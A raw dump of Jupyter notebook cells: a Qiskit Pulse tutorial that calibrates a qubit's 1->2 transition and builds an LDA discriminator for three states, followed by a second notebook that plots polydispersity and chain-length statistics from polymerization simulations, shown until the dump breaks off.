"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom scipy.optimize import curve_fit\n\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.model_selection import train_test_split\n\nfrom qiskit import pulse # This is where we access all of our Pulse features!\nfrom qiskit.circuit import Parameter # This is Parameter Class for variable parameters.\nfrom qiskit.circuit import QuantumCircuit, Gate\nfrom qiskit import schedule\n\nfrom qiskit.tools.monitor import job_monitor",
"_____no_output_____"
],
[
"from qiskit.tools.jupyter import *\n%matplotlib inline\n\nfrom qiskit import IBMQ\nIBMQ.load_account()\nprovider = IBMQ.get_provider(hub='ibm-q', group='open', project='main')\nbackend = provider.get_backend('ibmq_manila')\n\nbackend_defaults = backend.defaults()\n\nbackend_properties = backend.properties()\n\n# unit conversion factors -> all backend properties returned in SI (Hz, sec, etc.)\nGHz = 1.0e9 # Gigahertz\nMHz = 1.0e6 # Megahertz\nus = 1.0e-6 # Microseconds\nns = 1.0e-9 # Nanoseconds\n\nqubit = 0 # qubit we will analyze\n\ndefault_qubit_freq = backend_defaults.qubit_freq_est[qubit] # Default qubit frequency in Hz. \nprint(f\"Qubit {qubit} has an estimated frequency of {default_qubit_freq/ GHz} GHz.\")\n\ndefault_anharmonicity = backend_properties.qubits[qubit][3].value # Default anharmonicity in GHz\nprint(f\"Default anharmonicity is {default_anharmonicity} GHz.\")\n\n# scale data (specific to each device)\nscale_factor = 1e-7\n\n# number of shots for our experiments\nNUM_SHOTS = 1024",
"Qubit 0 has an estimated frequency of 4.962374160530024 GHz.\nDefault anharmonicity is -0.3433479504893883 GHz.\n"
]
],
[
[
"We define some additional helper functions.",
"_____no_output_____"
]
],
[
[
"def get_job_data(job, average):\n \"\"\"Retrieve data from a job that has already run.\n Args:\n job (Job): The job whose data you want.\n average (bool): If True, gets the data assuming data is an average.\n If False, gets the data assuming it is for single shots.\n Return:\n list: List containing job result data. \n \"\"\"\n job_results = job.result(timeout = 120) # timeout parameter set to 120 s\n result_data = []\n for i in range(len(job_results.results)):\n if average: # get avg data\n result_data.append(np.real(job_results.get_memory(i)[qubit] * scale_factor))\n else: # get single data\n result_data.append(job_results.get_memory(i)[:, qubit] * scale_factor)\n return result_data\n\ndef get_closest_multiple_of_16(num):\n \"\"\"Compute the nearest multiple of 16. Needed because pulse enabled devices require \n durations which are multiples of 16 samples.\n \"\"\"\n return int(num + 8 ) - (int(num + 8 ) % 16)",
"_____no_output_____"
]
],
[
[
"Next we include some default parameters for drive pulses. ",
"_____no_output_____"
]
],
[
[
"# there are pulse parameters of the single qubit drive in IBM devices\nx12_duration = 160\nx12_sigma = 40",
"_____no_output_____"
]
],
[
[
"## Discriminating the $|0\\rangle$, $|1\\rangle$ and $|2\\rangle$ states <a id=\"discrim012\"></a> ",
"_____no_output_____"
],
[
"given we have already calibrated X gate in the qubit subspace, which is available as XGate instruction in the quantum circuit. Here we calibrate transition in the higher energy subspace with pulse gate.",
"_____no_output_____"
],
[
"We focus on exciting the $|2\\rangle$ state and building a discriminator to classify $|0\\rangle$, $|1\\rangle$ and $2\\rangle$ states from their respective IQ data points. The procedure for even higher states ($|3\\rangle$, $|4\\rangle$, etc.) should be similar, but we have not tested them explicitly.",
"_____no_output_____"
],
[
"The process for building the higher state discriminator is as follows:\n1. Compute the $1\\rightarrow2$ frequency.\n2. Conduct a Rabi experiment to obtain the $\\pi$ pulse amplitude for $1\\rightarrow2$. To do this, we first apply a $0\\rightarrow1$ $\\pi$ pulse to get from the $|0\\rangle$ to the $|1\\rangle$ state. Then, we do a sweep of drive amplitudes at the $1\\rightarrow2$ frequency obtained above.\n3. Construct 3 schedules:\\\n a. Zero schedule: just measure the ground state.\\\n b. One schedule: apply a $0\\rightarrow1$ $\\pi$ pulse and measure.\\\n c. Two schedule: apply a $0\\rightarrow1$ $\\pi$ pulse, then a $1\\rightarrow2$ $\\pi$ pulse and measure.\n4. Separate the data from each schedule into training and testing sets and construct an LDA model for discrimination.",
"_____no_output_____"
],
[
"### Computing the 1->2 frequency <a id=\"freq12\"></a>",
"_____no_output_____"
],
[
"The first step in our calibration is to compute the frequency needed to go from the $1\\rightarrow2$ state. There are two methods to do this:\n1. Do a frequency sweep from the ground state and apply very high power. If the applied power is large enough, two peaks should be observed. One at the $0\\rightarrow1$ frequency found in section [1](#discrim01) and one at the $0\\rightarrow2$ frequency. The $1\\rightarrow2$ frequency can be obtained by taking the difference of the two. Unfortunately, for `ibmq_armonk`, the maximum drive power of $1.0$ is not sufficient to see this transition. Instead, we turn to the second method.\n2. Excite the $|1\\rangle$ state by applying a $0\\rightarrow1$ $\\pi$ pulse. Then perform the frequency sweep over excitations of the $|1\\rangle$ state. A single peak should be observed at a frequency lower than the $0\\rightarrow1$ frequency which corresponds to the $1\\rightarrow2$ frequency.",
"_____no_output_____"
],
[
"We follow the second method described above. ",
"_____no_output_____"
]
],
[
[
"# smaller range sweep\nnum_freqs = 75\ndrive_power = 0.15\nsweep_freqs = default_anharmonicity*GHz + np.linspace(-30*MHz, 30*MHz, num_freqs)",
"_____no_output_____"
],
[
"freq = Parameter('freq')\nwith pulse.build(backend=backend, default_alignment='sequential', name='Frequency sweep') as freq12_sweep_sched:\n drive_chan = pulse.drive_channel(qubit)\n with pulse.frequency_offset(freq, drive_chan):\n pulse.play(pulse.Gaussian(duration=x12_duration,\n amp=drive_power,\n sigma=x12_sigma,\n name='x12_pulse'), drive_chan)",
"_____no_output_____"
],
[
"spect_gate = Gate(\"spect\", 1, [freq])\n\nqc_spect = QuantumCircuit(1, 1)\n\nqc_spect.x(0)\nqc_spect.append(spect_gate, [0])\nqc_spect.measure(0, 0)\nqc_spect.add_calibration(spect_gate, (0,), freq12_sweep_sched, [freq])\n \nexp_spect_circs = [qc_spect.assign_parameters({freq: f}) for f in sweep_freqs]",
"_____no_output_____"
],
[
"excited_freq_sweep_job = backend.run(exp_spect_circs, \n meas_level=1, \n meas_return='avg', \n shots=NUM_SHOTS)",
"_____no_output_____"
],
[
"job_monitor(excited_freq_sweep_job)",
"Job Status: job has successfully run\n"
],
[
"# Get the refined data (average)\nexcited_freq_sweep_data = get_job_data(excited_freq_sweep_job, average=True)\nexcited_sweep_freqs = default_qubit_freq + default_anharmonicity*GHz + np.linspace(-30*MHz, 30*MHz, num_freqs)",
"_____no_output_____"
]
],
[
[
"Let's plot and fit the refined signal, using the standard Lorentzian curve.",
"_____no_output_____"
]
],
[
[
"def fit_function(x_values, y_values, function, init_params):\n \"\"\"Fit a function using scipy curve_fit.\"\"\"\n fitparams, conv = curve_fit(function, x_values, y_values, init_params, maxfev = 50000)\n y_fit = function(x_values, *fitparams)\n \n return fitparams, y_fit",
"_____no_output_____"
],
[
"# do fit in Hz\n(excited_sweep_fit_params, \n excited_sweep_y_fit) = fit_function(excited_sweep_freqs,\n excited_freq_sweep_data, \n lambda x, A, q_freq, B, C: (A / np.pi) * (B / ((x - q_freq)**2 + B**2)) + C,\n [-20, 4.625*GHz, 0.06*GHz, 3*GHz] # initial parameters for curve_fit\n )",
"_____no_output_____"
],
[
"# Note: we are only plotting the real part of the signal\nplt.scatter(excited_sweep_freqs/GHz, excited_freq_sweep_data, color='black')\nplt.plot(excited_sweep_freqs/GHz, excited_sweep_y_fit, color='red')\nplt.xlim([min(excited_sweep_freqs/GHz), max(excited_sweep_freqs/GHz)])\nplt.xlabel(\"Frequency [GHz]\", fontsize=15)\nplt.ylabel(\"Measured Signal [a.u.]\", fontsize=15)\nplt.title(\"1->2 Frequency Sweep (refined pass)\", fontsize=15)\nplt.show()",
"_____no_output_____"
],
[
"_, qubit_12_freq, _, _ = excited_sweep_fit_params\nprint(f\"Our updated estimate for the 1->2 transition frequency is \"\n f\"{round(qubit_12_freq/GHz, 7)} GHz.\")",
"Our updated estimate for the 1->2 transition frequency is 4.6186648 GHz.\n"
]
],
[
[
"### 1->2 Rabi Experiment <a id=\"rabi12\"></a>",
"_____no_output_____"
],
[
"Now that we have a good estimate for the $1\\rightarrow2$ frequency, we perform a Rabi experiment to obtain the $\\pi$ pulse amplitude for the $1\\rightarrow2$ transition. To do so, we apply a $0\\rightarrow1$ $\\pi$ pulse and then sweep over drive amplitudes at the $1\\rightarrow2$ frequency.",
"_____no_output_____"
]
],
[
[
"# experimental configuration\nnum_rabi_points = 75 # number of experiments (ie amplitudes to sweep out)\n\n# Drive amplitude values to iterate over: 75 amplitudes evenly spaced from 0 to 1.0\ndrive_amp_min = 0\ndrive_amp_max = 1.0\ndrive_amps = np.linspace(drive_amp_min, drive_amp_max, num_rabi_points)",
"_____no_output_____"
],
[
"amp = Parameter('amp')\nwith pulse.build(backend=backend, default_alignment='sequential', name='Amp sweep') as rabi_sched:\n drive_chan = pulse.drive_channel(qubit)\n pulse.set_frequency(qubit_12_freq, drive_chan)\n pulse.play(pulse.Gaussian(duration=x12_duration,\n amp=amp,\n sigma=x12_sigma,\n name='x12_pulse'), drive_chan)",
"_____no_output_____"
],
[
"rabi_gate = Gate(\"rabi\", 1, [amp])\n\nqc_rabi = QuantumCircuit(1, 1)\n\nqc_rabi.x(0)\nqc_rabi.append(rabi_gate, [0])\nqc_rabi.measure(0, 0)\nqc_rabi.add_calibration(rabi_gate, (0,), rabi_sched, [amp])\n \nexp_rabi_circs = [qc_rabi.assign_parameters({amp: a}) for a in drive_amps]\n ",
"_____no_output_____"
],
[
"rabi_12_job = backend.run(exp_rabi_circs, \n meas_level=1, \n meas_return='avg', \n shots=NUM_SHOTS)",
"_____no_output_____"
],
[
"job_monitor(rabi_12_job)",
"Job Status: job has successfully run\n"
],
[
"# Get the job data (average)\nrabi_12_data = get_job_data(rabi_12_job, average=True)",
"_____no_output_____"
],
[
"def baseline_remove(values):\n \"\"\"Center data around 0.\"\"\"\n return np.array(values) - np.mean(values)",
"_____no_output_____"
],
[
"# Note: Only real part of data is plotted\nrabi_12_data = np.real(baseline_remove(rabi_12_data))\n(rabi_12_fit_params, \n rabi_12_y_fit) = fit_function(drive_amps,\n rabi_12_data, \n lambda x, A, B, drive_12_period, phi: (A*np.cos(2*np.pi*x/drive_12_period - phi) + B),\n [0.2, 0, 0.3, 0])\n\nplt.scatter(drive_amps, rabi_12_data, color='black')\nplt.plot(drive_amps, rabi_12_y_fit, color='red')\n\ndrive_12_period = rabi_12_fit_params[2] \n\npi_amp_12 = drive_12_period/2\n\nplt.axvline(pi_amp_12, color='red', linestyle='--')\nplt.axvline(pi_amp_12+drive_12_period/2, color='red', linestyle='--')\nplt.annotate(\"\", xy=(pi_amp_12+drive_12_period/2, 0), xytext=(pi_amp_12,0), arrowprops=dict(arrowstyle=\"<->\", color='red'))\nplt.annotate(\"$\\pi$\", xy=(pi_amp_12-0.03, 0.1), color='red')\n\nplt.xlabel(\"Drive amp [a.u.]\", fontsize=15)\nplt.ylabel(\"Measured signal [a.u.]\", fontsize=15)\nplt.title('Rabi Experiment (1->2)', fontsize=20)\nplt.show()\n",
"_____no_output_____"
]
],
[
[
"We plot and fit our data as before.",
"_____no_output_____"
]
],
[
[
"print(f\"Our updated estimate for the 1->2 transition frequency is \"\n f\"{round(qubit_12_freq/GHz, 7)} GHz.\")\nprint(f\"Pi Amplitude (1->2) = {pi_amp_12}\")",
"Our updated estimate for the 1->2 transition frequency is 4.6186648 GHz.\nPi Amplitude (1->2) = 0.16461038080918777\n"
]
],
[
[
"### Build the 0, 1, 2 discriminator <a id=\"builddiscrim012\"></a>",
"_____no_output_____"
],
[
"Finally, we build our discriminator for the $|0\\rangle$, $|1\\rangle$ and $|2\\rangle$ states. ",
"_____no_output_____"
],
[
"As a review, our three circuits are (again, recalling that our system starts in the $|0\\rangle$ state): \n1. Measure the $|0\\rangle$ state directly (obtain $|0\\rangle$ centroid).\n2. Apply $0\\rightarrow1$ $\\pi$ pulse and then measure (obtain $|1\\rangle$ centroid).\n3. Apply $0\\rightarrow1$ $\\pi$ pulse, then $1\\rightarrow2$ $\\pi$ pulse, then measure (obtain $|2\\rangle$ centroid).",
"_____no_output_____"
]
],
[
[
"with pulse.build(backend=backend, default_alignment='sequential', name='x12 schedule') as x12_sched:\n drive_chan = pulse.drive_channel(qubit)\n pulse.set_frequency(qubit_12_freq, drive_chan)\n pulse.play(pulse.Gaussian(duration=x12_duration,\n amp=pi_amp_12,\n sigma=x12_sigma,\n name='x12_pulse'), drive_chan)",
"_____no_output_____"
],
[
"# Create the three circuits\n\n# 0 state\nqc_ground = QuantumCircuit(1, 1)\nqc_ground.measure(0, 0)\n\n# 1 state\nqc_one = QuantumCircuit(1, 1)\nqc_one.x(0)\nqc_one.measure(0, 0)\n\n# 2 state \nx12_gate = Gate(\"one_two_pulse\", 1, [])\nqc_x12 = QuantumCircuit(1, 1)\nqc_x12.x(0)\nqc_x12.append(x12_gate, [0])\nqc_x12.measure(0, 0)\nqc_x12.add_calibration(x12_gate, (0,), x12_sched, [])",
"_____no_output_____"
]
],
[
[
"We construct the program and plot the centroids in the IQ plane.",
"_____no_output_____"
]
],
[
[
"# Assemble the schedules into a program\nIQ_012_job = backend.run([qc_ground, qc_one, qc_x12], \n meas_level=1, \n meas_return='single', \n shots=NUM_SHOTS)",
"_____no_output_____"
],
[
"job_monitor(IQ_012_job)",
"Job Status: job has successfully run\n"
],
[
"# Get job data (single); split for zero, one and two\nIQ_012_data = get_job_data(IQ_012_job, average=False)\nzero_data = IQ_012_data[0]\none_data = IQ_012_data[1]\ntwo_data = IQ_012_data[2]",
"_____no_output_____"
],
[
"def IQ_012_plot(x_min, x_max, y_min, y_max):\n \"\"\"Helper function for plotting IQ plane for 0, 1, 2. Limits of plot given\n as arguments.\"\"\"\n # zero data plotted in blue\n plt.scatter(np.real(zero_data), np.imag(zero_data), \n s=5, cmap='viridis', c='blue', alpha=0.5, label=r'$|0\\rangle$')\n # one data plotted in red\n plt.scatter(np.real(one_data), np.imag(one_data), \n s=5, cmap='viridis', c='red', alpha=0.5, label=r'$|1\\rangle$')\n # two data plotted in green\n plt.scatter(np.real(two_data), np.imag(two_data), \n s=5, cmap='viridis', c='green', alpha=0.5, label=r'$|2\\rangle$')\n\n # Plot a large dot for the average result of the 0, 1 and 2 states.\n mean_zero = np.mean(zero_data) # takes mean of both real and imaginary parts\n mean_one = np.mean(one_data)\n mean_two = np.mean(two_data)\n plt.scatter(np.real(mean_zero), np.imag(mean_zero), \n s=200, cmap='viridis', c='black',alpha=1.0)\n plt.scatter(np.real(mean_one), np.imag(mean_one), \n s=200, cmap='viridis', c='black',alpha=1.0)\n plt.scatter(np.real(mean_two), np.imag(mean_two), \n s=200, cmap='viridis', c='black',alpha=1.0)\n \n plt.xlim(x_min, x_max)\n plt.ylim(y_min,y_max)\n plt.legend()\n plt.ylabel('I [a.u.]', fontsize=15)\n plt.xlabel('Q [a.u.]', fontsize=15)\n plt.title(\"0-1-2 discrimination\", fontsize=15)",
"_____no_output_____"
],
[
"x_min = -5\nx_max = 5\ny_min = -10\ny_max = 10\nIQ_012_plot(x_min, x_max, y_min, y_max)",
"_____no_output_____"
]
],
[
[
"Now it is time to actually build the discriminator. We will use a machine learning technique called Linear Discriminant Analysis (LDA). LDA classifies an arbitrary data set into a set of categories (here $|0\\rangle$, $|1\\rangle$ and $|2\\rangle$) by maximizing the distance between the means of each category and minimizing the variance within each category. For further detail, see [here](https://scikit-learn.org/stable/modules/lda_qda.html#id4) (Ref. [3](#refs)). \n\nLDA generates a line called a separatrix. Depending on which side of the separatrix a given data point is on, we can determine which category it belongs to. \n\nWe use `scikit.learn` for an implementation of LDA; in a future release, this functionality will be added released directly into Qiskit-Ignis (see [here](https://github.com/Qiskit/qiskit-ignis/tree/master/qiskit/ignis/measurement/discriminator)). ",
"_____no_output_____"
],
[
"We observe a third centroid corresponding to the $|2\\rangle$ state. (Note: If the plot looks off, rerun the notebook.)",
"_____no_output_____"
],
[
"We begin by reshaping our result data into a format suitable for discrimination. ",
"_____no_output_____"
]
],
[
[
"def reshape_complex_vec(vec):\n \"\"\"Take in complex vector vec and return 2d array w/ real, imag entries. This is needed for the learning.\n Args:\n vec (list): complex vector of data\n Returns:\n list: vector w/ entries given by (real(vec], imag(vec))\n \"\"\"\n length = len(vec)\n vec_reshaped = np.zeros((length, 2))\n for i in range(len(vec)):\n vec_reshaped[i]=[np.real(vec[i]), np.imag(vec[i])]\n return vec_reshaped",
"_____no_output_____"
]
],
[
[
"We begin by shaping the data for LDA.",
"_____no_output_____"
]
],
[
[
"# Create IQ vector (split real, imag parts)\nzero_data_reshaped = reshape_complex_vec(zero_data)\none_data_reshaped = reshape_complex_vec(one_data) \ntwo_data_reshaped = reshape_complex_vec(two_data) \n\nIQ_012_data = np.concatenate((zero_data_reshaped, one_data_reshaped, two_data_reshaped))\nprint(IQ_012_data.shape) # verify IQ data shape",
"(3072, 2)\n"
]
],
[
[
"Next, we split our training and testing data. The testing data is a vector containing an array of `0`'s (for the zero schedule, `1`'s (for the one schedule) and `2`'s (for the two schedule).",
"_____no_output_____"
]
],
[
[
"# construct vector w/ 0's, 1's and 2's (for testing)\nstate_012 = np.zeros(NUM_SHOTS) # shots gives number of experiments\nstate_012 = np.concatenate((state_012, np.ones(NUM_SHOTS)))\nstate_012 = np.concatenate((state_012, 2*np.ones(NUM_SHOTS)))\nprint(len(state_012))\n\n# Shuffle and split data into training and test sets\nIQ_012_train, IQ_012_test, state_012_train, state_012_test = train_test_split(IQ_012_data, state_012, test_size=0.5)",
"3072\n"
]
],
[
[
"Finally, we set up our model and train it. The accuracy of our fit is printed.",
"_____no_output_____"
]
],
[
[
"# Set up the LDA\nLDA_012 = LinearDiscriminantAnalysis()\nLDA_012.fit(IQ_012_train, state_012_train)",
"_____no_output_____"
],
[
"# test on some simple data \nprint(LDA_012.predict([[0, 0], [-10, 0], [-15, -5]]))",
"[2. 0. 0.]\n"
],
[
"# Compute accuracy\nscore_012 = LDA_012.score(IQ_012_test, state_012_test)\nprint(score_012)",
"0.8522135416666666\n"
]
],
[
[
"The last step is to plot the separatrix. ",
"_____no_output_____"
]
],
[
[
"# Plot separatrix on top of scatter\ndef separatrixPlot(lda, x_min, x_max, y_min, y_max, shots):\n nx, ny = shots, shots\n\n xx, yy = np.meshgrid(np.linspace(x_min, x_max, nx),\n np.linspace(y_min, y_max, ny))\n Z = lda.predict_proba(np.c_[xx.ravel(), yy.ravel()])\n Z = Z[:, 1].reshape(xx.shape)\n\n plt.contour(xx, yy, Z, [0.5], linewidths=2., colors='black')",
"_____no_output_____"
],
[
"IQ_012_plot(x_min, x_max, y_min, y_max)\nseparatrixPlot(LDA_012, x_min, x_max, y_min, y_max, NUM_SHOTS)",
"_____no_output_____"
]
],
[
[
"Now that we have 3 centroids, the separatrix is no longer a line, but rather a curve containing a combination of two lines. In order to discriminate between $|0\\rangle$, $|1\\rangle$ and $|2\\rangle$ states, our model checks where the IQ point lies relative to the separatrix and classifies the point accordingly.",
"_____no_output_____"
],
[
"## References <a id=\"refs\"></a>",
"_____no_output_____"
],
[
"1. D. C. McKay, T. Alexander, L. Bello, M. J. Biercuk, L. Bishop, J. Chen, J. M. Chow, A. D. C ́orcoles, D. Egger, S. Filipp, J. Gomez, M. Hush, A. Javadi-Abhari, D. Moreda, P. Nation, B. Paulovicks, E. Winston, C. J. Wood, J. Wootton, and J. M. Gambetta, “Qiskit backend specifications for OpenQASM and OpenPulse experiments,” 2018, https://arxiv.org/abs/1809.03452.\n2. Krantz, P. et al. “A Quantum Engineer’s Guide to Superconducting Qubits.” Applied Physics Reviews 6.2 (2019): 021318, https://arxiv.org/abs/1904.06560.\n3. Scikit-learn: Machine Learning in Python, Pedregosa et al., JMLR 12, pp. 2825-2830, 2011, https://scikit-learn.org/stable/modules/lda_qda.html#id4.",
"_____no_output_____"
]
],
[
[
"import qiskit.tools.jupyter\n%qiskit_version_table",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
]
] |
cb0345a6a880817bacbe0140ecd3743b47cb6b8c | 147,405 | ipynb | Jupyter Notebook | paper/analysis/Statistics.ipynb | jkrajniak/paper-cg-md-simulations-of-polymerization-with-forward-and-backward-reactions | 8030aed77f8db545faa835542dc67921aa863d88 | [
"Unlicense"
] | null | null | null | paper/analysis/Statistics.ipynb | jkrajniak/paper-cg-md-simulations-of-polymerization-with-forward-and-backward-reactions | 8030aed77f8db545faa835542dc67921aa863d88 | [
"Unlicense"
] | null | null | null | paper/analysis/Statistics.ipynb | jkrajniak/paper-cg-md-simulations-of-polymerization-with-forward-and-backward-reactions | 8030aed77f8db545faa835542dc67921aa863d88 | [
"Unlicense"
] | null | null | null | 207.905501 | 20,898 | 0.881151 | [
[
[
"import collections\nimport numpy as np\nimport seaborn as sns\nimport os\nimport matplotlib.gridspec as gridspec\nimport pickle\nfrom matplotlib import pyplot as plt\nimport matplotlib as mpl\n\npgf_with_custom_preamble = {\n \"text.usetex\": False, # use inline math for ticks\n \"pgf.rcfonts\": False, # don't setup fonts from rc parameters\n}\n\ndef figsize(scale, height_ratio=1.0):\n fig_width_pt = 344.43306 # Get this from LaTeX using \\the\\textwidth\n inches_per_pt = 1.0/72.27 # Convert pt to inch\n golden_mean = (np.sqrt(5.0)-1.0)/2.0 # Aesthetic ratio (you could change this)\n fig_width = fig_width_pt*inches_per_pt*scale # width in inches\n fig_height = height_ratio*fig_width*golden_mean # height in inches\n fig_size = [fig_width,fig_height]\n return fig_size\n\npgf_with_latex = { # setup matplotlib to use latex for output\n \"pgf.texsystem\": \"pdflatex\", # change this if using xetex or lautex\n \"text.usetex\": True, # use LaTeX to write all text\n \"font.family\": \"sans-serif\",\n \"font.serif\": [], # blank entries should cause plots to inherit fonts from the document\n \"font.sans-serif\": [],\n \"font.monospace\": [],\n \"axes.labelsize\": 10, # LaTeX default is 10pt font.\n \"font.size\": 10,\n \"legend.fontsize\": 8, # Make the legend/label fonts a little smaller\n \"xtick.labelsize\": 8,\n \"ytick.labelsize\": 8,\n \"figure.figsize\": figsize(0.9), # default fig size of 0.9 textwidth\n \"pgf.preamble\": [\n r\"\\usepackage[utf8x]{inputenc}\", # use utf8 fonts becasue your computer can handle it :)\n r\"\\usepackage[T1]{fontenc}\", # plots will be generated using this preamble\n ]\n }\n\nsns.set_style('ticks')\nsns.set_context('poster')\nsns.set_palette('dark', 40)\n\ncolors = sns.color_palette('dark', 40)\n\nmpl.rcParams.update(pgf_with_latex)\n\n# I make my own newfig and savefig functions\ndef newfig(width):\n plt.clf()\n fig = plt.figure(figsize=figsize(width))\n ax = fig.add_subplot(111)\n return fig, ax\n\ndef savefig(filename):\n plt.savefig('{}.pgf'.format(filename))\n plt.savefig('{}.pdf'.format(filename))\n\n%matplotlib inline\n\n\n\nfrom scipy import interpolate\n#plt.subplots_adjust(left=.15, bottom=.16, right=.99, top=.97)",
"_____no_output_____"
],
[
"plt.rcParams[\"axes.labelsize\"]",
"_____no_output_____"
],
[
"%matplotlib inline",
"_____no_output_____"
]
],
[
[
"# PDI, Pn\n## No water",
"_____no_output_____"
]
],
[
[
"cr = 0.001\nscan_p0_1000_nowater = collections.defaultdict(list)\nfor f in sorted(os.listdir('scan_p_1000/no_water/')):\n if f.startswith('polstat'):\n k = float(f.split('_')[2])\n if k != cr:\n continue\n d = np.loadtxt(os.path.join('scan_p_1000/no_water/', f))\n header = open(os.path.join('scan_p_1000/no_water/', f)).readline().replace('#', '').split()\n d.dtype = [(x, 'float') for x in header]\n scan_p0_1000_nowater[k].append(d)\n\navg_no_water_pdi = []\np_vals = np.arange(0.0, 0.925, 0.01)\nfor l in scan_p0_1000_nowater[cr]:\n x = (l['cr']/2000)[:, 0]\n y = l['pdi'][:, 0]\n print(x.shape, y.shape, max(x))\n f = interpolate.interp1d(x, y)\n ynew = f(p_vals)\n avg_no_water_pdi.append(ynew)\n #plt.plot(l['cr']/2000, l['pdi'])\np_vals = np.array(p_vals)\nstd_no_water_pdi = np.std(np.array(avg_no_water_pdi), axis=0)\navg_no_water_pdi = np.average(avg_no_water_pdi, axis=0)",
"(9355,) (9355,) 0.925\n(10001,) (10001,) 0.9275\n(9882,) (9882,) 0.925\n(9419,) (9419,) 0.925\n(13990,) (13990,) 0.95\n(8919,) (8919,) 0.925\n"
],
[
"plt.rcParams['figure.figsize'] = figsize(0.9)\nfor l in scan_p0_1000_nowater[cr]:\n x = (l['cr']/2000.0)\n y = l['pdi']\n plt.plot(x, y, '.', markevery=100, alpha=0.8)\n#plt.errorbar(p_vals, avg_no_water_pdi, std_no_water_pdi)\nplt.plot(np.arange(0.0, 1.0, 0.01), 1+np.arange(0.0, 1.0, 0.01), linestyle='--', color='k', linewidth=1.8, label='1+p')\nplt.annotate(r'$k_f={}$'.format(cr), xy=(0.05, 0.75), xycoords='axes fraction', fontsize=12)\nplt.legend(loc=0)\nplt.ylabel('PDI')\nplt.xlabel('p')\nplt.tight_layout()\nplt.xticks([0.0, 0.2, 0.5, 0.8, 0.9, 1.0])\nplt.yticks([1.0, 1.5, 2.0, 2.5])\nplt.tick_params(size=5, direction='inout', right=True)\nplt.savefig('result_graphics/pdi_no_water.pdf', dpi=200)",
"_____no_output_____"
],
[
"plt.rcParams['figure.figsize'] = figsize(0.9, height_ratio=1.5)\nf, (a0, a1) = plt.subplots(2,1, gridspec_kw = {'height_ratios':[2, 1]})\n\nl = scan_p0_1000_nowater[0.001][0]\na0.plot(l['cr']/2000, l['pn'], '*', markevery=200, color='k')\na0.plot(l['cr']/2000, 1/(1-l['cr']/2000), label=r'1/(1-p)', linestyle='--', color='k', linewidth=1.8)\n#a0.set_xlabel('p')\na0.set_ylabel(r'$\\langle n \\rangle$')\na0.legend()\na0.set_xticks([0.0, 0.2, 0.4, 0.6, 0.8, 0.9])\n\nl = scan_p0_1000_nowater[0.001][0]\ntheory_val = 1/(1-l['cr']/2000)\na1.plot(l['cr']/2000, np.abs(l['pn']-theory_val), linestyle='None', marker='.', color='k')\na1.set_xlabel('p')\na1.set_ylabel(r'$|\\Delta|$')\na1.set_xticks([0.0, 0.2, 0.4, 0.6, 0.8, 0.9])\nf.tight_layout()\nplt.savefig('result_graphics/average_n_no_water.pdf', dpi=200)",
"_____no_output_____"
]
],
[
[
"## Water",
"_____no_output_____"
]
],
[
[
"plt.rcParams['figure.figsize'] = figsize(0.9)\ncr = 0.001\nscan_p0_1000_water = collections.defaultdict(list)\nfor f in sorted(os.listdir('scan_p_1000/with_water/')):\n if f.startswith('polstat'):\n k = float(f.split('_')[2])\n if k != cr:\n continue\n d = np.loadtxt(os.path.join('scan_p_1000/with_water/', f))\n header = open(os.path.join('scan_p_1000/with_water/', f)).readline().replace('#', '').split()\n if len(header) < 8:\n continue\n d.dtype = [(x, 'float') for x in header]\n scan_p0_1000_water[k].append(d)\n# avg_water_pdi = []\n# p_vals = np.arange(0.0, 0.925, 0.01)\n# for l in scan_p0_1000_water[0.001]:\n# x = (l['cr']/2000)[:, 0]\n# y = l['pdi'][:, 0]\n# print x.shape, y.shape, max(x)\n# f = interpolate.interp1d(x, y)\n# ynew = f(p_vals)\n# avg_water_pdi.append(ynew)\n# #plt.plot(l['cr']/2000, l['pdi'])\n# p_vals = np.array(p_vals)\n# std_water_pdi = np.std(np.array(avg_water_pdi), axis=0)\n# avg_water_pdi = np.average(avg_water_pdi, axis=0)\n\n\nfor l in scan_p0_1000_water[cr]:\n x = (l['cr']/2000.0)\n y = l['pdi']\n plt.plot(x, y, '.', markevery=100)\nplt.annotate(r'$k_f={}$'.format(cr), xy=(0.05, 0.72), xycoords='axes fraction', fontsize=12)\nplt.plot(np.arange(0.0, 1.0, 0.01), 1+np.arange(0.0, 1.0, 0.01), linestyle='--', color='k', linewidth=1.8, label='1+p')\nplt.ylabel('PDI')\nplt.xlabel('p')\nplt.legend(loc=0)\nplt.tight_layout()\nplt.xticks([0.0, 0.2, 0.5, 0.8, 0.9, 1.0])\nplt.yticks([1.0, 1.5, 2.0, 2.25])\nplt.tick_params(size=5, direction='inout', right=True)\nplt.savefig('result_graphics/pdi_water.pdf', dpi=200)\n#plt.savefig('pdi_water.png', dpi=200)",
"_____no_output_____"
],
[
